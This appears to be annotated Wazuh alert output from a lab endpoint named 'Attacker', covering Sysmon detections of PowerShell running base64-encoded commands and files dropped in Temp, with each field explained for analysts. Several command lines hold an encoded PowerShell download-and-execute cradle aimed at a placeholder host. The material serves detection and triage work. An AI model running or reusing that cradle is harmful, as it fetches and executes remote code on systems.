data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:52.769+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:52.769+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  63
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534272.1496244
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:50.4145156Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284108
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:50.403 ProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00} ProcessId: 10384 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_40uxjzck.fes.ps1 CreationUtcTime: 2025-04-24 22:37:50.403 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:50.403
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd3c-680a-570b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_40uxjzck.fes.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:50.403
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:55.932+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:55.932+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  60
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534275.1499013
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:53.3104930Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284125
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:51.737 ProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00} ProcessId: 9020 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00} ParentProcessId: 10384 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:51.737
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd3f-680a-590b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd3c-680a-570b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:55.932+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:55.932+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  64
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534275.1507080
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:53.5659094Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284126
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:53.554 ProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00} ProcessId: 9020 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_aeouh1r0.rm1.ps1 CreationUtcTime: 2025-04-24 22:37:53.551 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:53.554
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd3f-680a-590b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_aeouh1r0.rm1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:53.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:57.346+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:57.346+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  61
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534277.1509845
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:54.9897371Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284143
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:54.445 ProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00} ProcessId: 5944 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00} ParentProcessId: 9020 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:54.445
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd42-680a-5b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5944
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd3f-680a-590b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

